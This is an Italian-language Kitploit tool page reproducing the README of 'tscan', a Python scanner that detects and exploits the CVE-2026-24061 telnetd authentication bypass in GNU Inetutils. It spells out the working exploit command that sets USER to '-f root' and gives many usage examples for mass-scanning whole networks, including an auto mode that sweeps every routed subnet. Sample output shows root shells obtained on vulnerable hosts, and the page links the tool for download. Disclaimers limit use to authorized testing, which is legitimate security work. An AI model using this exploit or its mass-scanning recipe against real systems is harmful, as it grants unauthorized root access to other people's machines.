Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/cumakurt/tscan
RicognizioneScanner di VulnerabilitàScansione PorteExploitSicurezza di RetePenetration TestingApprendimento e Formazione
GitHubcumakurt/tscan

tscan

Scanner basato su Python che rileva e sfrutta il bypass dell'autenticazione telnetd di CVE-2026-24061, consentendo l'accesso a una shell root sui servizi GNU Inetutils vulnerabili.

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner per Bypass dell'Autenticazione Telnetd (CVE-2026-24061)

Uno scanner basato su Python per rilevare e sfruttare la vulnerabilità CVE-2026-24061 nei servizi telnetd di GNU Inetutils. Questo strumento esegue la scansione di indirizzi IP o reti alla ricerca di servizi telnetd vulnerabili che consentono il bypass dell'autenticazione con accesso a una shell di root.


⚠️ AVVISO LEGALE IMPORTANTE E DISCLAIMER

QUESTO SOFTWARE È FORNITO ESCLUSIVAMENTE PER SCOPI EDUCATIVI E DI TEST DI SICUREZZA AUTORIZZATI.

1. Scopo Educativo

Questa applicazione è stata sviluppata esclusivamente per scopi educativi per dimostrare vulnerabilità di sicurezza e per assistere in test di sicurezza e ricerche autorizzate.

2. Nessuna Garanzia

QUESTO SOFTWARE È FORNITO "COSÌ COM'È", SENZA ALCUNA GARANZIA, ESPRESSA O IMPLICITA, INCLUSI, A TITOLO ESEMPLIFICATIVO, LE GARANZIE DI COMMERCIABILITÀ, IDONEITÀ PER UNO SCOPO PARTICOLARE E NON VIOLAZIONE. GLI AUTORI E I COLLABORATORI NON GARANTISCONO CHE IL SOFTWARE SIA PRIVO DI ERRORI, SICURO O FUNZIONANTE. Il software può contenere bug, errori o altri difetti.

3. Responsabilità dell'Utente

TUTTA LA RESPONSABILITÀ E LA RILEVANZA GIURIDICA PER L'USO DI QUESTO SOFTWARE RICADE INTERAMENTE SULL'UTENTE. Gli autori, i collaboratori e i distributori di questo software non saranno ritenuti responsabili per eventuali danni, perdite o conseguenze legali derivanti dall'uso, dall'abuso o dall'incapacità di utilizzare questo software.

4. Uso Non Autorizzato Vietato

Questo strumento deve essere utilizzato SOLO su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta a testare. L'accesso non autorizzato a sistemi informatici è illegale e può comportare un'azione penale.

5. Nessuna Garanzia

Gli autori NON garantiscono:

  • L'accuratezza dei risultati della scansione
  • La sicurezza dell'applicazione stessa
  • La compatibilità con tutti i sistemi
  • L'assenza di bug o errori
  • Qualsiasi funzionalità o prestazione specifica

Utilizzando questo software, dichiari di aver letto, compreso e accettato di essere vincolato da questi termini. Se non sei d'accordo, non utilizzare questo software.


Sviluppatore

Sviluppato da: Cuma KURT
Email: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

Informazioni sulla Vulnerabilità

CVE-2026-24061: telnetd di GNU Inetutils fino alla versione 2.7 consente il bypass remoto dell'autenticazione tramite un valore -f root per la variabile d'ambiente USER.

Punteggio CVSS: 9.8 (Critico)

Riferimento: NVD CVE-2026-24061

Funzionalità

  • 🔍 Scansione delle Porte: Rileva porte telnet aperte (predefinita: 23, personalizzabile)
  • 🎯 Rilevamento delle Vulnerabilità: Verifica la sfruttabilità di CVE-2026-24061
  • ⚡ Multi-thread: Scansione concorrente veloce con numero di thread configurabile
  • 📁 Input Flessibile: Supporta indirizzi IP, reti CIDR e file di elenco target
  • 🗺️ Rilevamento Automatico: Rileva e scansiona automaticamente le sottoreti dalla tabella di routing
  • 🛑 Interruzione Sicura: Ctrl+C interrompe la scansione in modo sicuro e mostra i risultati parziali
  • 📊 Avanzamento in Tempo Reale: Barra di avanzamento con statistiche e risultati

Installazione

Prerequisiti

  • Python 3.6 o superiore
  • Client telnet (solitamente preinstallato su Linux/macOS)

Installare le Dipendenze

root@kitploit:~
pip3 install -r requirements.txt

Nota: La maggior parte delle dipendenze fa parte della libreria standard di Python. Lo strumento funziona immediatamente con Python 3.6+.

Utilizzo

Utilizzo di Base

root@kitploit:~
# Scansione di un singolo indirizzo IP
python3 tscan.py 192.168.1.1

# Scansione di una rete CIDR
python3 tscan.py 192.168.1.0/24

# Scansione con porta personalizzata
python3 tscan.py -p 2323 192.168.1.1

# Scansione di target da un file
python3 tscan.py targets.txt

# Scansione di più indirizzi IP
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# Scansione di più reti CIDR
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

Ottimizzazione delle Prestazioni

root@kitploit:~
# Aumenta il numero di thread per una scansione più rapida (100 thread)
python3 tscan.py -t 100 192.168.1.0/24

# Aumenta il timeout per reti lente
python3 tscan.py --timeout 10 192.168.1.0/24

# Combina entrambi per scansioni di reti estese
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

Modalità di Rilevamento Automatico

root@kitploit:~
# Rileva e scansiona automaticamente tutte le sottoreti dalla tabella di routing di sistema
python3 tscan.py --auto
# oppure usa la forma abbreviata:
python3 tscan.py -a

# Rilevamento automatico con porta personalizzata
python3 tscan.py --auto -p 2323
# oppure:
python3 tscan.py -a -p 2323

# Rilevamento automatico con numero elevato di thread
python3 tscan.py --auto -t 200
# oppure:
python3 tscan.py -a -t 200

Nota: La modalità --auto legge la tabella di routing di sistema tramite il comando ip route list o route -n e scansiona automaticamente tutte le sottoreti rilevate.

Esempi Reali

root@kitploit:~
# Esempio 1: Scansione rapida della rete locale
python3 tscan.py 192.168.1.0/24

# Esempio 2: Scansione veloce con elevata concorrenza
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# Esempio 3: Scansione di una porta telnet non standard
python3 tscan.py -p 2323 192.168.1.0/24

# Esempio 4: Rilevamento automatico e scansione di tutte le sottoreti locali
python3 tscan.py --auto
# oppure:
python3 tscan.py -a

# Esempio 5: Rilevamento automatico con impostazioni personalizzate
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# oppure:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

Opzioni della Riga di Comando

root@kitploit:~
argomenti posizionali:
  targets               Indirizzo(i) IP, rete(i) CIDR o percorso(i) di file contenenti i target

opzioni:
  -h, --help            Mostra questo messaggio di aiuto ed esci
  -p, --port PORT       Porta telnet da scansionare (predefinita: 23)
  -t, --threads THREADS Numero di thread concorrenti (predefinito: 50)
  --timeout TIMEOUT     Timeout di connessione in secondi (predefinito: 5)
  -v, --verbose         Output dettagliato
  -a, --auto            Rileva e scansiona automaticamente tutte le sottoreti dalla tabella di routing di sistema (route -n o ip route list)

Formato del File di Input

Crea un file di testo con un target per riga:

root@kitploit:~
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

Le righe che iniziano con # sono trattate come commenti e ignorate.

Output

Lo strumento fornisce:

  1. Avanzamento in Tempo Reale: Mostra i risultati man mano che vengono scoperti

    • Barra di avanzamento con percentuale e statistiche
    • Conteggio degli host vulnerabili visualizzato nella barra di avanzamento
    • [!] - Host vulnerabile
    • [~] - Porta aperta ma non vulnerabile
    • I target con porta chiusa vengono saltati silenziosamente
    • Ctrl+C (KeyboardInterrupt): Interrompe la scansione in modo sicuro e mostra immediatamente i risultati parziali
  2. Rapporto di Riepilogo: Include:

    • Totale dei servizi telnet trovati
    • Numero di host vulnerabili
    • Elenco dettagliato degli host vulnerabili

Esempio di Output

Output di Scansione di Base

root@kitploit:~
[*] Avvio della scansione su 256 target...
[*] Porta: 23, Thread: 50, Timeout: 5s

[*] Avanzamento: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Aperte: 2 | Vulnerabili: 1
[!] 192.168.1.100:23 - VULNERABILE
[*] Avanzamento: [████████████████████████████████████] 100.0% (256/256) | Aperte: 3 | Vulnerabili: 1
[+] Scansione completata: 256/256 target scansionati

======================================================================
Riepilogo dei Risultati della Scansione
======================================================================

Servizi telnet trovati: 3
Host vulnerabili: 1

[!] HOST VULNERABILI:

  ● 192.168.1.100:23
    Output: uid=0(root) gid=0(root) groups=0(root)...

[~] Servizi telnet trovati ma non vulnerabili:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] Scansione completata in 12.34 secondi

Come Funziona

  1. Rilevamento della Porta: Verifica se la porta telnet è aperta sugli IP target
  2. Tentativo di Exploit: Per le porte aperte, tenta l'exploit CVE-2026-24061:
    • Imposta la variabile d'ambiente USER="-f root"
    • Si connette tramite il comando telnet -a
    • Invia comandi di test per verificare l'accesso alla shell di root
  3. Classificazione dei Risultati: Classifica i risultati come vulnerabili o non vulnerabili

Dettagli dell'Exploit

La vulnerabilità consente il bypass dell'autenticazione impostando la variabile d'ambiente USER su -f root:

root@kitploit:~
USER="-f root" telnet -a IP_TARGET [PORTA]

Questo induce telnetd a interpretare la variabile USER come un flag, bypassando l'autenticazione e concedendo l'accesso di root.

Limitazioni

  • Richiede l'installazione del client telnet
  • Funziona solo contro versioni vulnerabili di telnetd (≤ 2.7)
  • La modalità di rilevamento automatico richiede il comando ip route list o route -n

Risoluzione dei Problemi

"comando telnet non trovato"

Installa il client telnet:

root@kitploit:~
# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# Solitamente preinstallato

Nessun risultato trovato

  • Verifica che i target siano raggiungibili
  • Controlla le regole del firewall
  • Assicurati che i servizi telnet siano effettivamente in esecuzione
  • Prova ad aumentare il timeout: --timeout 10

Uso Legale ed Etico

Questo strumento è destinato a:

  • ✅ Test di penetrazione autorizzati
  • ✅ Ricerca sulla sicurezza sui propri sistemi
  • ✅ Valutazione delle vulnerabilità con la dovuta autorizzazione
  • ✅ Scopi educativi in ambienti controllati

NON utilizzare questo strumento per:

  • ❌ Accesso non autorizzato ai sistemi
  • ❌ Attività di hacking illegali
  • ❌ Qualsiasi attività senza esplicita autorizzazione

Riferimenti

  • Dettagli CVE-2026-24061
  • Analisi di SafeBreach Labs

Licenza

Questo programma è software libero: puoi ridistribuirlo e/o modificarlo secondo i termini della GNU General Public License come pubblicata dalla Free Software Foundation, versione 3 della Licenza, o (a tua scelta) qualsiasi versione successiva.

Questo programma è distribuito nella speranza che possa essere utile, ma SENZA ALCUNA GARANZIA; senza nemmeno la garanzia implicita di COMMERCIABILITÀ o IDONEITÀ PER UNO SCOPO PARTICOLARE. Vedere la GNU General Public License per maggiori dettagli.

Dovresti aver ricevuto una copia della GNU General Public License insieme a questo programma. In caso contrario, vedi https://www.gnu.org/licenses/.

Testo Completo della Licenza

Vedi il file LICENSE per il testo completo della GNU General Public License v3.0.

Disclaimer

GLI AUTORI E I COLLABORATORI NON SONO RESPONSABILI PER QUALSIASI USO IMPROPRIO O DANNO CAUSATO DA QUESTO STRUMENTO.

Questo strumento è fornito ESCLUSIVAMENTE PER SCOPI EDUCATIVI E DI TEST DI SICUREZZA AUTORIZZATI.

USALO A TUO RISCHIO. Tutta la responsabilità e la rilevanza giuridica per l'uso di questo software ricade interamente sull'utente. Gli autori non garantiscono l'accuratezza, la sicurezza o la funzionalità di questo software. Il software è fornito "COSÌ COM'È" senza alcuna garanzia di alcun tipo.

Questa applicazione è stata sviluppata esclusivamente per scopi educativi. Utilizzando questo software, dichiari di riconoscere che:

  • Comprendi che si tratta di uno strumento educativo
  • Tutta la responsabilità per il suo utilizzo è tua
  • Gli autori non forniscono garanzie o assicurazioni
  • Lo utilizzerai solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta a testare
  • L'uso non autorizzato è illegale e può comportare un'azione penale

Se non accetti questi termini, NON UTILIZZARE QUESTO SOFTWARE.

Scarica lo strumento